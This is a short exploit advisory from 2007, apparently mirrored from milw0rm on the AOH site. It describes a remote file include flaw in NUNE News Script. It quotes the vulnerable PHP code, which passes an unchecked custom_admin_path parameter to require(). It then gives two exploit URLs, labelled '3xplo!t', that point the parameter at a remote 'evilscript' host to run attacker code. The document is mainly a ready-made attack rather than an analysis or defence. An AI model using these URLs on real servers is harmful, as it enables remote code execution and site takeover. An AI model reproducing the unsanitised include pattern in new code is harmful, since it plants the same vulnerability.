AOH :: HP Unsorted N :: C07-1711.HTM

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity



NUNE News Script (custom_admin_path) Remote File Include Vulnerablity
NUNE News Script (custom_admin_path) Remote File Include Vulnerablity



-----------------------------------------------

NUNE News Script (custom_admin_path) Remote File Include Vulnerablity

-----------------------------------------------

Author: xoron

-----------------------------------------------

Code:

if (isset($custom_admin_path))
    $special_admin_path = $custom_admin_path;

else
    $special_admin_path = "news/admin";

require("$special_admin_path/config/nune.conf.php");

-----------------------------------------------

3xplo!t:

www.target.com/[script]/index.php?custom_admin_path=http://evilscript? 
www.target.com/[script]/archives.php?custom_admin_path=http://evilscript? 

-----------------------------------------------

download: http://download.sourceforge.net/nune/nune-2.0pre2.tar.gz 

-----------------------------------------------

Greetz: str0ke, kacper, GODAttach

nukedx'e elveda, kendine iyi bak dostum..!

-----------------------------------------------

# milw0rm.com [2007-01-06]

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.